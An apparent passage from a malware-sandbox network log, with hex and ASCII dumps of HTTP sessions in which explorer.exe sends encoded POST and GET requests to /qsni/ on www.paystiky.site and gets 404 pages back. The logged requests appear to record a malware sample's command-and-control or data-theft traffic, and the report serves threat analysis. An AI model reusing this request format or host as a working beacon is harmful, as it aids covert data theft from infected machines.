7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
                                                                                          Mar 30, 2023 10:24:44.236615896 CEST146INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                          Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                          Mar 30, 2023 10:24:44.236640930 CEST147INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                          Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
                                                                                          Mar 30, 2023 10:24:44.236661911 CEST148INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                          Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          17192.168.2.649724199.192.30.14780C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:46.647113085 CEST150OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.paystiky.site
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.paystiky.site
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.paystiky.site/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 37 66 28 7a 39 4e 4a 64 72 6f 36 64 53 35 64 70 63 2d 4b 57 69 77 53 5a 6e 69 55 65 42 69 30 4d 53 45 42 5a 62 38 62 37 6d 30 4b 5a 33 70 55 4d 67 66 47 4e 63 69 49 7a 57 48 39 5f 4c 6d 78 51 77 45 53 41 75 48 47 44 4d 7a 37 57 78 6e 62 55 6e 52 78 73 59 73 43 70 54 48 49 45 4a 63 30 4b 34 6c 42 62 5a 58 7e 32 59 71 55 71 77 57 44 51 64 49 6a 31 56 34 4b 42 78 73 32 44 49 52 64 36 64 6d 4c 6c 70 42 49 56 41 2d 70 53 36 34 34 7a 76 67 51 39 32 37 30 73 59 47 78 4d 77 53 55 37 39 55 6e 4d 4f 75 47 56 45 38 39 6f 71 44 4c 56 71 36 38 6c 67 64 37 70 6c 6a 41 44 6d 58 45 49 59 45 30 72 70 4d 30 6a 6c 6c 55 6e 77 50 71 70 39 65 72 6e 52 7a 41 45 47 55 7a 52 7e 65 46 44 37 69 79 71 50 6e 4f 73 66 59 6b 4c 57 73 62 50 43 49 68 6a 6c 38 46 47 4b 79 6e 76 6c 4d 4a 2d 48 46 6b 50 34 33 39 75 34 78 39 54 77 64 32 5a 46 69 42 6b 6d 4e 53 41 5a 78 44 6c 62 36 4e 36 58 49 61 69 34 4a 51 69 53 78 47 56 42 50 46 43 4e 59 6b 6e 79 66 52 4d 6b 66 78 43 43 52 67 70 45 63 34 5a 65 65 33 6f 37 5f 55 39 4b 2d 62 78 46 5f 72 78 57 33 39 63 68 66 61 73 69 6b 6d 77 34 49 59 2d 53 56 68 57 4b 70 70 39 66 59 5a 69 69 57 52 37 31 72 77 49 64 73 33 36 76 75 6b 51 69 6f 38 68 67 58 6a 78 63 4c 51 78 4a 33 78 46 6c 55 68 67 50 39 77 50 74 50 37 6b 30 67 68 72 75 33 62 37 51 49 65 68 28 56 66 70 51 50 4d 57 39 4b 61 4f 39 6f 35 73 44 54 56 65 49 33 50 4f 4b 79 4c 34 6e 70 64 32 6f 47 5a 30 76 66 34 39 68 54 30 4d 41 36 6d 4c 67 69 62 49 45 72 75 7a 7a 6d 78 70 79 75 6c 58 6c 2d 71 72 6d 70 4e 42 6e 43 67 45 5a 55 67 46 62 43 55 70 57 4a 42 2d 47 31 78 49 6e 57 65 6d 6d 6d 32 39 74 77 51 54 39 4e 4e 32 7e 76 64 77 61 39 34 76 50 57 49 49 39 42 4b 6c 72 6d 4c 61 35 30 36 6d 58 72 36 51 47 58 50 55 73 63 58 7a 67 43 55 6d 45 76 43 50 28 48 51 67 74 62 30 4b 71 5f 31 34 39 66 65 4e 7a 79 5a 75 5a 4e 65 63 59 4d 49 65 32 5a 4d 6a 31 78 74 74 63 57 35 6a 48 77 63 44 39 57 69 75 38 43 46 48 64 33 62 77 77 6c 38 61 4c 77 55 64 42 36 4c 31 6a 66 4e 54 57 39 7e 72 63 79 45 44 69 53 30 7a 6f 45 44 49 4b 47 75 4d 6d 5f 65 5f 58 69 46 38 7e 36 30 65 72 5f 69 4e 34 79 52 38 76 48 4e 45 77 55 6b 4e 49 43 35 61 7a 4e 54 74 57 55 57 6f 41 78 28 61 76 30 55 31 48 57 33 62 52 51 79 33 4b 59 44 39 38 4c 57 61 4e 6c 56 4f 45 4a 4e 50 4e 54 76 50 4e 68 35 52 32 2d 4c 49 30 6b 49 7a 46 53 42 58 43 74 74 2d 4e 31 39 61 6a 52 62 68 51 35 5a 33 39 4f 68 67 36 4d 4e 36 74 53 46 62 36 39 4c 66 68 47 75 55 61 65 7e 4a 44 59 6c 73 61 6d 6a 65 28 55 4a 4e 69 37 57 52 68 75 4e 55 4d 54 47 46 6a 34 67 61 6a 61 34 73 4c 61 4c 39 70 49 6b 4b 42 65 49 44 4d 6b 76 47 75 76 45 52 7e 4c 65 57 78 4d 73 57 64 6e 59 73 28 4b 4f 4f 51 45 35 6a 53 63 31 49 74 57 61 4f 71 34 46 35 69 57 62 4d 30 4f 78 35 66 4c 59 50 67 70 73 4e 32 75 65 78 55 6e 67 67 6e 76 4b 37 28 61 72 53 5a 41 78 36 48 53 7a 69 54 30 61 4c 79 47 43 67 4e 61 6e 46 30 42 65 5a 42 67 77 59 68 68 6d 57 49 6a 70 74 78 4e 7e 4c 65 4f 75 6e 48 4d 57 4c 44 6f 6b 75 67 59 56 76 35 41 43 69 64 5a 52 56 39 33 46 2d 6a 72 6f 46 39 6c 34 7a 4b 43 61 4f 58 6a 54 57 34 31 46 49 67 2d 6e 4d 4c 59 64 30 76 32 53 79 34 38 62 76 32 55 6a 4a 41 58 49 59 64 53 51 61 58 70 34 49 77 66 6e 4d 61 6e 72 48 6e 68 4f 6b 65 51 70 57 31 6e 4a 43 55 32 66 55 77 37 54 76 7a 78 7a 47 4f 32 74 79 53 38 30 6a 72 2d 43 62 61 4b 6e 4e 4b 51 4f 4d 65 35 50 65 74 5a 6c 43 49 68 6d 67 4e 30 38 45 39 48 6d 67 7a 78 35 6a 52 34 4a 56 4a 65 76 37 4b 5f 41 6f 52 63 57 30 7e 2d 39 46 54 70 4b 54 59 5f 57 71 4b 71 62 6a 47 4d 61 31 52 69 62 59 66 77 6b 4a 28 57 79 38 7e 7a 75 4a 61 45 43 71 4e 69 76 41 30 4e 4f 74 33 36 48 4c 68 77 74 6d 67 62 33 48 32 59 38 53 6c 6e 42 37 4e 79 48 50 41 47 4d 66 50 37 67 6d 6a 66 65 69 47 52 56 57 34 4c 62 59 35 4b 49 69 56 6b 6e 76 42 62 59 6c 28 38 51 50 4d 65 46 67 6a 59 70 67 72 76 65 64 66 65 54 73 61 4e 73 33 74 37 7e 72 5a 49 62 57 43 41 42 73 68 38 75 75 44 36 4a 41 74 75 65 6c 71 76 36 58 79 65 45 4e 6d 4e 65 55 45 6c 4f 6a 42 57 6d 53 48 45 34 61 5a 74 54 46 56 4f 6e 47 55 48 6b 76 70 75 48 6d 4e 73 4c 77 41 4f 69 37 33 57 79 4c 4a 4e 6d 43 4d 55 74 34 74 6b 4d 7a 31 55 38 6e 47 4e 39 61 43 53 50 72 68 5f 77 6d
                                                                                          Data Ascii: C6=7f(z9NJdro6dS5dpc-KWiwSZniUeBi0MSEBZb8b7m0KZ3pUMgfGNciIzWH9_LmxQwESAuHGDMz7WxnbUnRxsYsCpTHIEJc0K4lBbZX~2YqUqwWDQdIj1V4KBxs2DIRd6dmLlpBIVA-pS644zvgQ9270sYGxMwSU79UnMOuGVE89oqDLVq68lgd7pljADmXEIYE0rpM0jllUnwPqp9ernRzAEGUzR~eFD7iyqPnOsfYkLWsbPCIhjl8FGKynvlMJ-HFkP439u4x9Twd2ZFiBkmNSAZxDlb6N6XIai4JQiSxGVBPFCNYknyfRMkfxCCRgpEc4Zee3o7_U9K-bxF_rxW39chfasikmw4IY-SVhWKpp9fYZiiWR71rwIds36vukQio8hgXjxcLQxJ3xFlUhgP9wPtP7k0ghru3b7QIeh(VfpQPMW9KaO9o5sDTVeI3POKyL4npd2oGZ0vf49hT0MA6mLgibIEruzzmxpyulXl-qrmpNBnCgEZUgFbCUpWJB-G1xInWemmm29twQT9NN2~vdwa94vPWII9BKlrmLa506mXr6QGXPUscXzgCUmEvCP(HQgtb0Kq_149feNzyZuZNecYMIe2ZMj1xttcW5jHwcD9Wiu8CFHd3bwwl8aLwUdB6L1jfNTW9~rcyEDiS0zoEDIKGuMm_e_XiF8~60er_iN4yR8vHNEwUkNIC5azNTtWUWoAx(av0U1HW3bRQy3KYD98LWaNlVOEJNPNTvPNh5R2-LI0kIzFSBXCtt-N19ajRbhQ5Z39Ohg6MN6tSFb69LfhGuUae~JDYlsamje(UJNi7WRhuNUMTGFj4gaja4sLaL9pIkKBeIDMkvGuvER~LeWxMsWdnYs(KOOQE5jSc1ItWaOq4F5iWbM0Ox5fLYPgpsN2uexUnggnvK7(arSZAx6HSziT0aLyGCgNanF0BeZBgwYhhmWIjptxN~LeOunHMWLDokugYVv5ACidZRV93F-jroF9l4zKCaOXjTW41FIg-nMLYd0v2Sy48bv2UjJAXIYdSQaXp4IwfnManrHnhOkeQpW1nJCU2fUw7TvzxzGO2tyS80jr-CbaKnNKQOMe5PetZlCIhmgN08E9Hmgzx5jR4JVJev7K_AoRcW0~-9FTpKTY_WqKqbjGMa1RibYfwkJ(Wy8~zuJaECqNivA0NOt36HLhwtmgb3H2Y8SlnB7NyHPAGMfP7gmjfeiGRVW4LbY5KIiVknvBbYl(8QPMeFgjYpgrvedfeTsaNs3t7~rZIbWCABsh8uuD6JAtuelqv6XyeENmNeUElOjBWmSHE4aZtTFVOnGUHkvpuHmNsLwAOi73WyLJNmCMUt4tkMz1U8nGN9aCSPrh_wmA49zUzImXxRtG1UQJKtCRzO067K-03dF(7YLhtang-9H1ge1~TowfwJ8AD~yaxAcyr5ATkLobtksvwkCiySYZSw.
                                                                                          Mar 30, 2023 10:24:46.985945940 CEST151INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:24:46 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 4406
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="/css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="/css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="/js/jquery.js"></script><script src="/js/superfish.js"></script><script src="/js/jquery.easing.1.3.js"></script><script src="/js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6countdown.com/img/upgrade.jpg"border="0"alt=""/></a></div> <![endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-
                                                                                          Mar 30, 2023 10:24:46.986006975 CEST153INData Raw: 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22
                                                                                          Data Ascii: ->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="screen"><link href='http://fonts.googleap
                                                                                          Mar 30, 2023 10:24:46.986026049 CEST154INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 50 72 6f 63 65 73 73 20 30 31 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22
                                                                                          Data Ascii: <li><a href="/">Process 01</a></li> <li><a href="/">Process 02</a></li> <li><a href="/">Process 03</a></li> </ul> </li> <li><a href="con
                                                                                          Mar 30, 2023 10:24:46.986037970 CEST155INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20
                                                                                          Data Ascii: > </form> </div> </div> </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          18192.168.2.649725199.192.30.14780C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:49.346447945 CEST155OUTGET /qsni/?ZOm=dXna0d&C6=2dXT+4Ai7ZbPKYl8drSkrCy2lxkaNy55YxFVHbvYyUio5rd6lf6SLF0ob3hHEU1U1UadvRiDLVbZ/zXRgBVvecK7bXV6D842o39gH3q8FOBk HTTP/1.1
                                                                                          Host: www.paystiky.site
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:24:50.631704092 CEST157INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:24:49 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 4406
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 7b 0d 0a 20 20 20 20 20 20 20 20 27 6f 70 61 63 69 74 79 27 3a 20 30 0d 0a 20 20 20 20 7d 2c 20 31 30 30 30 2c 20 27 65 61 73 65 4f 75 74 43 75 62 69 63 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 27 64 69 73 70 6c 61 79 27 2c 20 27 6e 6f 6e 65 27 29 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 38 5d 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 69 6e 74 65 72 6e 65 74 2d 65 78 70 6c 6f 72 65 72 2f 64 65 66 61 75 6c 74 2e 61 73 70 78 3f 6f 63 69 64 3d 69 65 36 5f 63 6f 75 6e 74 64 6f 77 6e 5f 62 61 6e 6e 65 72 63 6f 64 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 68 65 69 65 36 63 6f 75 6e 74 64 6f 77 6e 2e 63 6f 6d 2f 69 6d 67 2f 75 70 67 72 61 64 65 2e 6a 70 67 22 62 6f 72 64 65 72 3d 22 30 22 61 6c 74 3d 22 22 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 20 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d
